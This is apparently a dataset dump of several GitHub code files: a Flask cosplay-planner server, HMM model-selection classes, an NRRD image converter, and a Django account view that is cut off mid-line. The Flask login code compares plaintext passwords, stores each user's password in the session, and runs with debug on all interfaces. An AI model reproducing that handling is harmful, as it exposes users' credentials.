response\n\n@app.route('/disp_all_characters', methods=[\"POST\"])\ndef disp_all_characters():\n page_change = request.get_json()\n page_number = page_change[\"page\"]\n\n url, query, variables = crud.get_all_characters()\n variables = {\"page\": page_number, \"perPage\": 9}\n response = requests.post(url, json={'query': query, 'variables': variables}).json()['data']['Page']\n return response\n\n@app.route('/find_character', methods=[\"POST\"])\ndef disp_all_char_matches():\n inputName = request.get_json()\n\n url, query, variables = crud.api_find_all_character_by_name(inputName[\"name\"])\n response = requests.post(url, json={'query': query, 'variables': variables})\n return response.json()\n\n@app.route('/find_single_character', methods=[\"POST\"])\ndef disp_character_info():\n inputName = request.get_json()\n\n url, query, variables = crud.api_get_single_character(inputName[\"name\"])\n char_info = requests.post(url, json={'query': query, 'variables': variables}).json()[\"data\"][\"Character\"]\n show_list = {}\n\n for show in char_info[\"media\"][\"edges\"]:\n show_id = show[\"node\"][\"id\"]\n show_list[show_id] = show_list.get(show_id, {\"eng_title\": show[\"node\"][\"title\"][\"english\"], \n \"native_title\": show[\"node\"][\"title\"][\"native\"], \"show_img\": show[\"node\"][\"coverImage\"][\"medium\"]})\n\n response = {\"img\": char_info[\"image\"][\"medium\"], \"eng_name\": char_info[\"name\"][\"full\"], \"native_name\": char_info[\"name\"][\"native\"], \n \"age\": char_info[\"age\"], \"description\": char_info[\"description\"], \"gender\": char_info[\"gender\"], \"appears_in\": show_list}\n\n return response\n\n@app.route(\"/find_show\", methods=[\"POST\"])\ndef disp_show_info():\n show_title = request.get_json()[\"showName\"]\n url, query, variables = crud.api_get_single_show_by_name(show_title)\n show_info = requests.post(url, json={'query': query, 'variables': variables}).json()[\"data\"][\"Media\"]\n\n character_dic = {}\n for character in show_info[\"characters\"][\"edges\"]:\n character_id = character[\"node\"][\"id\"]\n character_img = character[\"node\"][\"image\"][\"medium\"]\n character_eng_name = character[\"node\"][\"name\"][\"full\"]\n character_native_name = character[\"node\"][\"name\"][\"native\"]\n\n character_dic[character_id] = character_dic.get(character_id, {\"character_img\": character_img, \"character_eng_name\": character_eng_name, \"character_native_name\": character_native_name})\n\n if show_info['endDate']['year'] == None: \n endDate = \"--/--/----\"\n else:\n endDate = datetime(show_info['endDate']['year'], show_info['endDate']['month'], show_info['endDate']['day']).strftime(\"%B/%d/%Y\")\n\n response = {\"show_info\":{\"show_img\": show_info['coverImage'][\"medium\"], \"show_eng_title\": show_info['title']['english'], \"show_native_title\": show_info['title']['native'], \n \"start_date\": datetime(show_info['startDate']['year'], show_info['startDate']['month'], show_info['startDate']['day']).strftime(\"%B/%d/%Y\"), \n \"end_date\": endDate, \n \"show_description\": show_info[\"description\"], \"num_episodes\": show_info[\"episodes\"]}, \"characters_in_show\": character_dic}\n return response\n\n#Sessions handling\n@app.route('/handle_login', methods=['POST'])\ndef handle_login():\n \"\"\"Log in user\"\"\"\n form = request.get_json()\n formType = form[\"formType\"]\n response = {\"message\": False, \"status\": False, \"user_name\": \"\"}\n \n\n if form[\"user_name\"] == None:\n response[\"message\"] = \"You haven't entered anything yet\"\n return response\n\n\n \n if formType == \"Login\":\n user = crud.get_user_by_user_name_or_email(form[\"user_name\"])\n if user == None:\n response[\"message\"] = \"Looks like we dont have that username or email. Click below to create an account.\"\n\n elif form[\"password\"] != user.user_password:\n response[\"message\"] = \"Wrong Password\"\n\n else: \n response[\"message\"] = \"Logged in\"\n response[\"status\"] = True\n\n session[\"user_info\"][\"user_name\"] = user.user_name\n session[\"user_info\"][\"user_id\"] = user.user_id\n session[\"user_info\"][\"user_password\"] = user.user_password\n session[\"user_info\"][\"email\"] = user.email\n session.modified = True\n\n \n elif formType == \"Create Account\":\n user = crud.get_user_by_user_name_or_email(form[\"email\"]) or crud.get_user_by_user_name_or_email(form[\"user_name\"])\n \n if \"@\" not in form[\"email\"]:\n response[\"message\"] = \"Please enter a valid email address\"\n \n elif user != None:\n response[\"message\"] = \"Looks like that email or user name already exist. Please log in or click forgot password.\"\n \n elif None in form.values():\n response[\"message\"] = \"Please fill out all fields to create account\"\n \n elif form[\"password\"] != form[\"password2\"]:\n response[\"message\"] = \"passwords do not match\"\n \n else:\n user = crud.create_new_user(form[\"user_name\"], form[\"password\"], \n form[\"fname\"], form[\"lname\"], form[\"email\"])\n db.session.add(user)\n db.session.commit()\n\n if (user != None) and (user.user_password == form[\"password\"]):\n response[\"message\"] = \"Account Created!\"\n response[\"status\"] = True\n response[\"user_name\"] = user.user_name\n \n session[\"user_info\"][\"user_name\"] = user.user_name\n session[\"user_info\"][\"user_id\"] = user.user_id\n session[\"user_info\"][\"user_password\"] = user.user_password\n session[\"user_info\"][\"email\"] = user.email\n session.modified = True\n\n elif response[\"message\"] == False:\n response[\"message\"] = \"There was an error in creating your account\"\n\n return response\n\n@app.route('/loggedIn')\ndef is_logged_in():\n response = {\"status\": False}\n if 'user_name' not in session['user_info']:\n return response\n else: \n response[\"status\"]=True\n return response\n\n@app.route('/acct_info')\ndef get_acct_info():\n user = crud.get_user_by_user_name_or_email(session[\"user_info\"][\"user_name\"])\n outfits = crud.get_users_outfits_by_id(user.user_id)\n collections = crud.get_users_collections_by_id(user.user_id)\n outfitInfo = []\n collectionInfo =[]\n for outfit in outfits:\n outfitCharImg = \"Empty\" if outfit.character_id == None else(crud.get_character_by_name_or_id(outfit.character_id).character_image_URL)\n outfitInfo.append((outfit.outfit_name, outfitCharImg))\n \n for collection in collections:\n collectionInfo.append((collection.collection_name, collection.last_updated.strftime(\"%B %d, %Y\"), len(collection.outfit_list)))\n \n account_info = {\"user_name\": user.user_name, \"date_created\": (user.date_created).strftime(\"%b %d, %Y\"), \n \"count_outfits\": len(outfits) , \"count_collect\": len(collections), \"collectionInfo\": collectionInfo, \"outfitInfo\": outfitInfo}\n\n return account_info\n\n@app.route('/user_creations')\ndef get_user_creations():\n user = crud.get_user_by_user_name_or_email(session[\"user_info\"][\"user_name\"])\n collections = crud.get_users_collections_by_id(user.user_id)\n outfits = crud.get_users_outfits_by_id(user.user_id)\n\n if len(collections) != 0:\n collecitons_info = []\n\n for collection in collections:\n char_list=[]\n outfit_list = []\n\n if collection.outfit_list != 0:\n for outfit in collection.outfit_list:\n outfit_list.append(outfit.outfit_name)\n char_list.append(crud.get_character_by_name_or_id(outfit.character_id).character_name)\n else:\n outfit_list.append(\"No Outfits in collection click the outfit tab and create a new one\")\n char_list.append(\"No Outfits in collection click the outfit tab and create a new one\")\n\n collecitons_info.append((collection.collection_name, collection.last_updated.strftime(\"%b-%d-%Y\"), char_list, outfit_list))\n\n collection_names = [collection.collection_name for collection in collections]\n else:\n collection_names = [\"No collections created. Select create new or no collection.\"]\n \n response = {\"collection_names\": collection_names, \"collections_info\": collecitons_info}\n return response\n\n@app.route('/get_outfit_info', methods=[\"POST\"])\ndef get_user_outfit_info():\n outfit_name = request.get_json()[\"name\"]\n outfit = crud.get_outfit_by_id_or_name(outfit_name)\n character = crud.get_character_by_name_or_id(outfit.character_id)\n collections = {}\n\n for collection in outfit.collection_list:\n collection_name = crud.get_colleciton(collection.collection_id).collection_name\n collections[collection.collection_id] = collections.get(collection.collection_id, collection_name)\n\n response = {\"outfit_name\": outfit.outfit_name, \"based_on\": character.character_name, \"based_on_img\": character.character_image_URL, \n \"collecitons_in\": collections, \"notes\": outfit.notes}\n\n return response\n\n@app.route('/get_collection_info', methods=[\"POST\"])\ndef get_user_collection_info():\n form = request.get_json()\n print(f\"*****{form}\")\n collection = crud.get_colleciton(form[\"name\"])\n char_list=[]\n outfit_list = []\n\n if collection.outfit_list != 0:\n for outfit in collection.outfit_list:\n outfit_list.append(outfit.outfit_name)\n char_list.append({\"char_name\": crud.get_character_by_name_or_id(outfit.character_id).character_name, \n \"char_img\": crud.get_character_by_name_or_id(outfit.character_id).character_image_URL})\n else:\n outfit_list.append(\"No Outfits in collection click the outfit tab and create a new one\")\n char_list.append(\"No Outfits in collection click the outfit tab and create a new one\")\n\n response = {\"collection_name\": form[\"name\"], \"char_list\": char_list, \"outfit_list\": outfit_list}\n return response\n\n@app.route('/create_new_outfit', methods=[\"POST\"])\ndef create_new():\n# Getting form infomation\n form = request.get_json()\n formType = form[\"formType\"]\n response = {\"submit_status\": False, \"message\": \"Error in creating outfit\"}\n user_id = session[\"user_info\"][\"user_id\"]\n#Adding charcter/show to site db after submission\n if crud.get_character_by_name_or_id(form[\"character_name\"]) == None:\n url, query, variables = crud.api_get_single_character(form[\"character_name\"])\n api_response = (requests.post(url, json={'query': query, 'variables': variables}).json())[\"data\"][\"Character\"]\n gender = api_response['gender'][0]\n character_image_URL = api_response['image']['medium']\n show_name = api_response[\"media\"]['edges'][0]['node']['title']['english']\n\n if crud.get_show_by_id_or_name(show_name) == None:\n url, query, variables = crud.api_get_single_show_by_name(show_name)\n api_show_response = (requests.post(url, json={'query': query, 'variables': variables}).json())[\"data\"][\"Media\"]\n\n english_title = api_show_response['title']['english']\n japanese_title = api_show_response['title']['native']\n air_date = datetime(api_show_response['startDate']['year'], api_show_response['startDate']['month'], api_show_response['startDate']['day'])\n new_show = crud.add_new_show(english_title, japanese_title, air_date)\n db.session.add(new_show)\n db.session.commit()\n\n new_char = crud.add_new_character(form[\"character_name\"], character_image_URL, gender, (crud.get_show_by_id_or_name(show_name)).show_id)\n db.session.add(new_char)\n db.session.commit()\n\n# User created outfit\n outfit_public = True if form[\"outfit_public\"] == \"Public\" else False\n new_outfit = crud.create_new_outfit(form[\"outfit_name\"], form[\"outfit_notes\"], crud.get_character_by_name_or_id(form[\"character_name\"]).character_id, user_id, outfit_public)\n db.session.add(new_outfit)\n db.session.commit()\n\n# User created new outfit add added to either a new or existing collection\n if formType == \"createNew\":\n collection_public = True if form[\"collection_public\"] == \"Public\" else False\n new_col = crud.create_new_collection(form[\"collection_name\"], user_id, collection_public)\n db.session.add(new_col)\n db.session.commit()\n\n new_col_out = crud.add_outfit_to_collection(crud.get_colleciton(form[\"collection_name\"]).collection_id, crud.get_outfit_by_id_or_name(form[\"outfit_name\"]).outfit_id)\n db.session.add(new_col_out)\n db.session.commit()\n\n reponse = {\"submit_status\": True, \"message\": \"Outfit created\"}\n return reponse\n \n elif formType == \"useExist\":\n new_col_out = crud.add_outfit_to_collection(crud.get_colleciton(form[\"collection_name\"]).collection_id, crud.get_outfit_by_id_or_name(form[\"outfit_name\"]).outfit_id)\n db.session.add(new_col_out)\n db.session.commit()\n \n reponse = {\"submit_status\": True, \"message\": \"Outfit created\"}\n return reponse\n\n else:\n reponse = {\"submit_status\": True, \"message\": \"Outfit created\"}\n return reponse \n\n@app.route('/create_new_col', methods=[\"POST\"])\ndef create_new_col():\n form = request.get_json()\n\n new_col = crud.create_new_collection(form[\"collection_name\"], session[\"user_info\"][\"user_id\"], True if form[\"public\"]==\"Public\" else False)\n db.session.add(new_col)\n db.session.commit()\n\n if form[\"outfitsList\"] != 0 :\n collection_id = crud.get_colleciton(form[\"collection_name\"]).collection_id\n for outfit in form[\"outfitsList\"]:\n outfit_id = crud.get_outfit_by_id_or_name(outfit).outfit_id\n add_out = crud.add_outfit_to_collection(collection_id, outfit_id)\n db.session.add(add_out)\n db.session.commit()\n response = {\"message\": \"successful\"}\n return response\n\n@app.route('/update_outfit', methods=[\"POST\"])\ndef update_outfit():\n form = request.get_json()\n outfit_id = crud.get_outfit_by_id_or_name(form[\"current_outfit\"]).outfit_id\n response = {\"message\": \"success\"}\n\n if form[\"change_name\"] != None:\n crud.change_outfit_name(outfit_id, form[\"change_name\"])\n db.session.commit()\n return response\n elif form[\"add_col\"] != None:\n for collection in form[\"add_col\"]:\n collection_id = crud.get_colleciton(collection).collection_id\n out_col = crud.add_outfit_to_collection(collection_id, outfit_id)\n db.session.add(out_col)\n db.session.commit()\n return response\n elif form[\"remove_col\"] != None:\n for collection in form[\"remove_col\"]:\n collection_id = crud.get_colleciton(collection).collection_id\n collection_object = crud.get_collection_outfit_object(outfit_id, collection_id)\n db.session.delete(collection_object)\n db.session.commit()\n return response\n elif form[\"notes\"] != None:\n crud.get_outfit_by_id_or_name(outfit_id).notes = form[\"notes\"]\n db.session.commit()\n return response\n \n return response\n\n@app.route('/update_collection', methods=[\"POST\"])\ndef update_user_collection():\n form = request.get_json()\n response = {\"message\": \"success\"}\n\n return response\n\n@app.route('/delete_creation', methods=[\"POST\"])\ndef delete_user_creation():\n form = request.get_json()\n response = {\"message\": \"success\"}\n\n if form[\"action\"] == \"delete_outfit\":\n outfit = crud.get_outfit_by_id_or_name(form[\"outfit_name\"])\n if outfit.collection_list:\n for col in outfit.collection_list:\n out_col = crud.get_collection_outfit_object(outfit.outfit_id, col.collection_id)\n db.session.delete(out_col)\n db.session.commit()\n\n\n db.session.delete(outfit)\n db.session.commit()\n elif form[\"action\"] == \"delete_collection\":\n collection = crud.get_colleciton(form[\"collection_name\"])\n if collection.outfit_list:\n for outfit in collection.outfit_list:\n out_col = crud.get_collection_outfit_object(outfit.outfit_id, collection.collection_id)\n db.session.delete(out_col)\n db.session.commit()\n\n\n return response\n\nif __name__ == \"__main__\":\n connect_to_db(app)\n app.run(debug=True, host=\"0.0.0.0\")\n","repo_name":"zhlavenh/Cosplay-Planner-App","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":19821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27595412678","text":"import math\nimport statistics\nimport warnings\nfrom _threading_local import local\n\nimport numpy as np\nfrom hmmlearn.hmm import GaussianHMM\nfrom numpy.testing.tests.test_utils import my_cacw\nfrom sklearn.model_selection import KFold\nfrom asl_utils import combine_sequences\n\n\nclass ModelSelector(object):\n '''\n base class for model selection (strategy design pattern)\n '''\n\n def __init__(self, all_word_sequences: dict, all_word_Xlengths: dict, this_word: str,\n n_constant=3,\n min_n_components=2, max_n_components=10,\n random_state=14, verbose=False):\n self.words = all_word_sequences\n self.hwords = all_word_Xlengths\n self.sequences = all_word_sequences[this_word]\n self.X, self.lengths = all_word_Xlengths[this_word]\n self.this_word = this_word\n self.n_constant = n_constant\n self.min_n_components = min_n_components\n self.max_n_components = max_n_components\n self.random_state = random_state\n self.verbose = verbose\n\n def select(self):\n for numComponents in range(self.min_n_components, self.max_n_components + 1):\n print(numComponents)\n\n def base_model(self, num_states):\n # with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n # warnings.filterwarnings(\"ignore\", category=RuntimeWarning)\n try:\n hmm_model = GaussianHMM(n_components=num_states, covariance_type=\"diag\", n_iter=1000,\n random_state=self.random_state, verbose=False).fit(self.X, self.lengths)\n if self.verbose:\n print(\"model created for {} with {} states\".format(self.this_word, num_states))\n return hmm_model\n except:\n if self.verbose:\n print(\"failure on {} with {} states\".format(self.this_word, num_states))\n return None\n\n\nclass SelectorConstant(ModelSelector):\n \"\"\" select the model with value self.n_constant\n\n \"\"\"\n\n def select(self):\n \"\"\" select based on n_constant value\n\n :return: GaussianHMM object\n \"\"\"\n best_num_components = self.n_constant\n return self.base_model(best_num_components)\n\n\nclass SelectorBIC(ModelSelector):\n \"\"\" select the model with the lowest Baysian Information Criterion(BIC) score\n\n http://www2.imm.dtu.dk/courses/02433/doc/ch6_slides.pdf\n Bayesian information criteria: BIC = -2 * logL + p * logN\n \"\"\"\n\n def select(self):\n \"\"\" select the best model for self.this_word based on\n BIC score for n between self.min_n_components and self.max_n_components\n\n :return: GaussianHMM object\n \"\"\"\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n betterScore = math.inf\n betterModel = None\n for numComponents in range(self.min_n_components, self.max_n_components + 1):\n try:\n if self.verbose:\n print(\"\\n\\n WORKING FOR WORD {} FOR {} STATES EN HMM\".format(self.this_word, numComponents))\n model = self.base_model(numComponents)\n logl = model.score(self.X, self.lengths)\n # the number of parameters\n # Transition probabilities (numComponents*(numComponents-1)) +\n # Starting probabilities (numComponents-1) +\n # Means (numComponents*n_features) + Variances (numComponents*n_features)\n n_features = len(self.X[0])\n p = (numComponents*numComponents) + (2*numComponents*n_features) - 1\n # the number of data points, here I chose the average of data by word\n N=len(self.lengths)\n\n # the BIC score\n BIC_score = -2*logl + (p*math.log(N))\n if self.verbose:\n print(\" score {} \".format(BIC_score))\n\n if BIC_score < betterScore:\n if self.verbose:\n print(\" {} components with lower score until now (the lower the better)\".format(numComponents))\n betterScore = BIC_score\n betterModel = model\n\n except:\n if self.verbose:\n print(\" FAIL TRAINING FOR {} COMPONENTS IN HMM\".format(numComponents))\n break\n return betterModel\n\n\n\nclass SelectorDIC(ModelSelector):\n ''' select best model based on Discriminative Information Criterion\n\n Biem, Alain. \"A model selection criterion for classification: Application to hmm topology optimization.\"\n Document Analysis and Recognition, 2003. Proceedings. Seventh International Conference on. IEEE, 2003.\n http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.58.6208&rep=rep1&type=pdf\n DIC = log(P(X(i)) - 1/(M-1)SUM(log(P(X(all but i))\n '''\n\n def select(self):\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n betterScore = -math.inf\n betterModel = None\n\n\n for numComponents in range(self.min_n_components, self.max_n_components + 1):\n try:\n if self.verbose:\n print(\"\\n\\n WORKING FOR WORD {} FOR {} STATES EN HMM\".format(self.this_word, numComponents))\n model = self.base_model(numComponents)\n logl = model.score(self.X, self.lengths)\n\n scores = []\n for __wrd in self.words.keys():\n if(__wrd != self.this_word):\n try:\n __X, __lengths = self.hwords[__wrd]\n logl = model.score(__X, __lengths)\n scores.append(logl)\n except:\n continue\n\n\n # calculating DIC score\n DIC_score = logl - np.mean(scores)\n if self.verbose:\n print(\" score {} \".format(DIC_score))\n\n if DIC_score > betterScore:\n if self.verbose:\n print(\" {} components with bigger score until now (the bigger the better)\".format(numComponents))\n betterScore = DIC_score\n betterModel = model\n\n except:\n if self.verbose:\n print(\" FAIL TRAINING FOR {} COMPONENTS IN HMM\".format(numComponents))\n break\n return betterModel\n\n\nclass SelectorCV(ModelSelector):\n ''' select best model based on average log Likelihood of cross-validation folds\n\n '''\n\n def select(self):\n maxScore = -math.inf\n maxModel = None\n\n for numComponents in range(self.min_n_components, self.max_n_components + 1):\n try:\n if self.verbose:\n print(\"\\n\\n WORKING FOR WORD {} FOR {} STATES EN HMM\".format(self.this_word, numComponents))\n print(\" {} WITH {} SEQUENCES, NUMBER OF FOLDS CHOOSEN {}\".format(self.this_word, len(self.sequences),min(3, len(self.sequences))))\n\n split_method = KFold(n_splits=min(3, len(self.sequences)))\n #restarting collection of scores\n scores = []\n numFold= 0\n\n # splitting in training and test sets\n for cv_train_idx, cv_test_idx in split_method.split(self.sequences):\n numFold += 1\n if self.verbose:\n print(\" Fold number {} \".format(numFold))\n #### TRAINING ####\n # get fold for training\n self.X, self.lengths = combine_sequences(cv_train_idx, self.sequences)\n # train\n model = self.base_model(numComponents)\n ### restoring X and lenghts after training\n self.X, self.lengths = self.hwords[self.this_word]\n\n #### SCORING ####\n # get fold for testing\n __x, __length = combine_sequences(cv_test_idx, self.sequences)\n # score\n logl = model.score(__x, __length)\n scores.append(logl)\n if self.verbose:\n print(\" score {} \".format(logl))\n #getting mean of scores and model\n score, model = np.mean(scores), model\n if self.verbose:\n print(\" Average score {} \".format(logl))\n\n\n if score > maxScore:\n maxScore = score\n maxModel = model\n if self.verbose:\n print(\" {} components with bigger score until now (the bigger the better)\".format(numComponents))\n except:\n if self.verbose:\n print(\" FAIL TRAINING FOR {} COMPONENTS IN HMM\".format(numComponents))\n break\n return maxModel\n\n","repo_name":"dougbel/AIND_04SignLenguageRecognizer","sub_path":"my_model_selectors.py","file_name":"my_model_selectors.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"69967629682","text":"import SimpleITK as sitk\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport os\nimport json\n\nfrom consts import SRC_ROOT, SEGMENTED_STRUCTURE, DST_ROOT, REGION_DATA_FILE, SEPARATE_SAMPLES, IMG_FORMAT\n\ndef getImgFileName(img_prefix, i):\n return f\"{img_prefix}_{i:03d}{IMG_FORMAT}\"\n\ndef convertToJPG(srcFile, dstFolder, img_prefix):\n image = sitk.ReadImage(srcFile)\n image_array = sitk.GetArrayFromImage(image)\n\n if not os.path.exists(dstFolder):\n os.makedirs(dstFolder)\n\n for i in range(image_array.shape[0]):\n imgFile = getImgFileName(img_prefix, i)\n cv2.imwrite(os.path.join(dstFolder,imgFile), image_array[i, :, :])\n\ndef plotImage(image,contours):\n plt.imshow(image, cmap='gray', vmin=0, vmax=255 )\n\n for contour in contours:\n xs = [v[0][0] for v in contour]\n ys = [v[0][1] for v in contour]\n plt.plot(xs,ys,linewidth=1)\n plt.show()\n \ndef getRegionsObject(contours):\n cnt = 0\n result = {}\n for contour in contours:\n xs = [v[0][0] for v in contour]\n ys = [v[0][1] for v in contour]\n\n result[str(cnt)] = {\n 'shape_attributes': {\n 'name': \"polygon\",\n 'all_points_x': np.array(xs).tolist(),\n 'all_points_y': np.array(ys).tolist()\n },\n 'region_attributes': {}\n }\n cnt += 1\n return result\n \n\ndef dumpRegionData(srcFile, dstFolder, img_prefix):\n image = sitk.ReadImage(srcFile)\n image_array = sitk.GetArrayFromImage(image)\n\n if not os.path.exists(dstFolder):\n os.makedirs(dstFolder)\n\n jsonFilePath = os.path.join(dstFolder, REGION_DATA_FILE)\n \n if SEPARATE_SAMPLES:\n jsonObject = {}\n else: \n try:\n with open(jsonFilePath, \"r\") as file:\n jsonObject = json.load(file)\n except FileNotFoundError:\n jsonObject = {}\n\n for i in range(image_array.shape[0]):\n contours, _ = cv2.findContours(image_array[i, :, :], cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n\n imgFile = getImgFileName(img_prefix, i)\n imgFilePath = os.path.join(dstFolder,imgFile)\n imgFileSize = os.path.getsize(imgFilePath)\n\n jsonObject[f\"{imgFile}{imgFileSize}\"] = {\n 'fileref': \"\",\n 'size': imgFileSize,\n 'filename': imgFile,\n 'base64_img_data': \"\",\n 'file_attributes': {},\n 'regions': getRegionsObject(contours)\n }\n\n # opcjonalnie można sobie wyswietlić plastry z naniesionymi konturami\n # (jeli są), uwaga: mocno spowalnia działanie\n #plotImage(cv2.imread(imgFilePath,cv2.IMREAD_GRAYSCALE),contours)\n\n with open(jsonFilePath, \"w\") as file:\n json.dump(jsonObject, file)#, indent=2)\n \n\ndef processSample(sample):\n srcFile = os.path.join(SRC_ROOT, sample, \"img.nrrd\")\n mandibleFile = os.path.join(SRC_ROOT, sample, \"structures\", SEGMENTED_STRUCTURE+\".nrrd\")\n\n # przetwarzam tylko te modele w których jest wysegmentowana zuchwa\n if os.path.exists(srcFile) and os.path.exists(mandibleFile):\n if SEPARATE_SAMPLES:\n dstDir = os.path.join(DST_ROOT, sample)\n else:\n dstDir = DST_ROOT\n \n img_prefix = f\"img{sample}\"\n\n convertToJPG(srcFile, dstDir, img_prefix)\n dumpRegionData(mandibleFile, dstDir, img_prefix)\n \n \ndef main():\n if not SEPARATE_SAMPLES:\n try:\n os.remove(os.path.join(DST_ROOT, REGION_DATA_FILE))\n except FileNotFoundError:\n pass\n\n for (dirpath, dirnames, filenames) in os.walk(SRC_ROOT):\n for sample in dirnames: # [0:3]:\n processSample(sample)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pojdulos/readNRRD","sub_path":"readNRRD.py","file_name":"readNRRD.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72906270963","text":"import os\nimport re\nimport itertools\nimport json\n\nfrom unfold.loginrequired import LoginRequiredAutoLogoutView\n\nfrom manifold.core.query import Query\nfrom manifoldapi.manifoldapi import execute_query, execute_admin_query\nfrom portal.actions import manifold_update_user, manifold_update_account, manifold_add_account, manifold_delete_account\nfrom portal.actions import (\n sfa_update_user, authority_get_pis, authority_add_pis,\n authority_remove_pis,authority_check_pis ,clear_user_creds )\n\nfrom unfold.page import Page \nfrom ui.topmenu import topmenu_items_live, the_user\n\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom myslice.theme import ThemeView\n\n# requires login\nclass UserView(LoginRequiredAutoLogoutView, ThemeView):\n template_name = \"manageuserview.html\"\n def dispatch(self, *args, **kwargs):\n return super(UserView, self).dispatch(*args, **kwargs)\n\n\n def get_context_data(self, **kwargs):\n\n page = Page(self.request)\n page.add_js_files ( [ \"js/jquery.validate.js\", \"js/my_account.register.js\", \"js/my_account.edit_profile.js\", \"js/jquery-ui.js\" ] )\n page.add_css_files ( [ \"css/onelab.css\", \"css/account_view.css\",\"css/plugin.css\",\"css/jquery-ui.css\" ] )\n\n for key, value in kwargs.iteritems():\n if key == \"email\":\n selected_email=value\n \n user_query = Query().get('local:user').filter_by('email', '==', selected_email).select('user_id','config','email','status')\n user_details = execute_admin_query(self.request, user_query)\n \n # not always found in user_details...\n config={}\n for user_detail in user_details:\n user_id = user_detail['user_id']\n user_email = user_detail['email'] \n # different significations of user_status\n if user_detail['status'] == 0: \n user_status = 'Disabled'\n elif user_detail['status'] == 1:\n user_status = 'Validation Pending'\n elif user_detail['status'] == 2:\n user_status = 'Enabled'\n else:\n user_status = 'N/A'\n #email = user_detail['email']\n if user_detail['config']:\n config = json.loads(user_detail['config'])\n authority_hrn = config.get('authority','Unknown Authority')\n \n\n platform_query = Query().get('local:platform').select('platform_id','platform','gateway_type','disabled')\n account_query = Query().get('local:account').filter_by('user_id', '==', user_id).select('user_id','platform_id','auth_type','config')\n platform_details = execute_query(self.request, platform_query)\n account_details = execute_admin_query(self.request, account_query)\n \n # initial assignment needed for users having account.config = {} \n platform_name = ''\n account_type = ''\n account_usr_hrn = ''\n account_pub_key = ''\n account_priv_key = ''\n account_reference = ''\n my_users = ''\n my_slices = ''\n my_auths = ''\n ref_acc_list = ''\n principal_acc_list = ''\n user_status_list = []\n platform_name_list = []\n platform_name_secondary_list = []\n platform_access_list = []\n platform_no_access_list = []\n total_platform_list = []\n account_type_list = []\n account_type_secondary_list = []\n account_reference_list = []\n delegation_type_list = []\n user_cred_exp_list = []\n slice_list = []\n auth_list = []\n slice_cred_exp_list = []\n auth_cred_exp_list = []\n usr_hrn_list = []\n pub_key_list = []\n \n for platform_detail in platform_details:\n if 'sfa' in platform_detail['gateway_type']:\n total_platform = platform_detail['platform']\n total_platform_list.append(total_platform)\n \n for account_detail in account_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n platform_name = platform_detail['platform']\n if 'config' in account_detail and account_detail['config'] is not '':\n account_config = json.loads(account_detail['config'])\n account_usr_hrn = account_config.get('user_hrn','N/A')\n account_pub_key = account_config.get('user_public_key','N/A')\n account_reference = account_config.get ('reference_platform','N/A')\n\n # credentials of myslice platform\n if 'myslice' in platform_detail['platform']:\n acc_user_cred = account_config.get('delegated_user_credential','N/A')\n acc_slice_cred = account_config.get('delegated_slice_credentials','N/A')\n acc_auth_cred = account_config.get('delegated_authority_credentials','N/A')\n #usr_hrn of myslice platform. used to check pi or no\n account_usr_hrn_myslice = account_config.get('user_hrn','N/A')\n\n\n if 'N/A' not in acc_user_cred:\n exp_date = re.search('(.*)', acc_user_cred)\n if exp_date:\n user_exp_date = exp_date.group(1)\n user_cred_exp_list.append(user_exp_date)\n\n my_users = [{'cred_exp': t[0]}\n for t in zip(user_cred_exp_list)]\n \n\n if 'N/A' not in acc_slice_cred:\n for key, value in acc_slice_cred.iteritems():\n slice_list.append(key)\n # get cred_exp date\n exp_date = re.search('(.*)', value)\n if exp_date:\n exp_date = exp_date.group(1)\n slice_cred_exp_list.append(exp_date)\n\n my_slices = [{'slice_name': t[0], 'cred_exp': t[1]}\n for t in zip(slice_list, slice_cred_exp_list)]\n\n if 'N/A' not in acc_auth_cred:\n for key, value in acc_auth_cred.iteritems():\n auth_list.append(key)\n #get cred_exp date\n exp_date = re.search('(.*)', value)\n if exp_date:\n exp_date = exp_date.group(1)\n auth_cred_exp_list.append(exp_date)\n\n my_auths = [{'auth_name': t[0], 'cred_exp': t[1]}\n for t in zip(auth_list, auth_cred_exp_list)]\n \n # for reference accounts\n if 'reference' in account_detail['auth_type']:\n account_type = 'Reference'\n delegation = 'N/A'\n platform_name_secondary_list.append(platform_name)\n account_type_secondary_list.append(account_type)\n account_reference_list.append(account_reference)\n ref_acc_list = [{'platform_name': t[0], 'account_type': t[1], 'account_reference': t[2]} \n for t in zip(platform_name_secondary_list, account_type_secondary_list, account_reference_list)]\n \n elif 'managed' in account_detail['auth_type']:\n account_type = 'Principal'\n delegation = 'Automatic'\n else:\n account_type = 'Principal'\n delegation = 'Manual'\n # for principal (auth_type=user/managed) accounts\n if 'reference' not in account_detail['auth_type']:\n platform_name_list.append(platform_name)\n account_type_list.append(account_type)\n delegation_type_list.append(delegation)\n usr_hrn_list.append(account_usr_hrn)\n pub_key_list.append(account_pub_key)\n user_status_list.append(user_status)\n # combining 5 lists into 1 [to render in the template] \n principal_acc_list = [{'platform_name': t[0], 'account_type': t[1], 'delegation_type': t[2], 'usr_hrn':t[3], 'usr_pubkey':t[4], 'user_status':t[5],} \n for t in zip(platform_name_list, account_type_list, delegation_type_list, usr_hrn_list, pub_key_list, user_status_list)]\n # to hide private key row if it doesn't exist \n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n account_priv_key = account_config.get('user_private_key','N/A')\n if 'sfa' in platform_detail['gateway_type']:\n platform_access = platform_detail['platform']\n platform_access_list.append(platform_access)\n \n # Removing the platform which already has access\n for platform in platform_access_list:\n total_platform_list.remove(platform)\n # we could use zip. this one is used if columns have unequal rows \n platform_list = 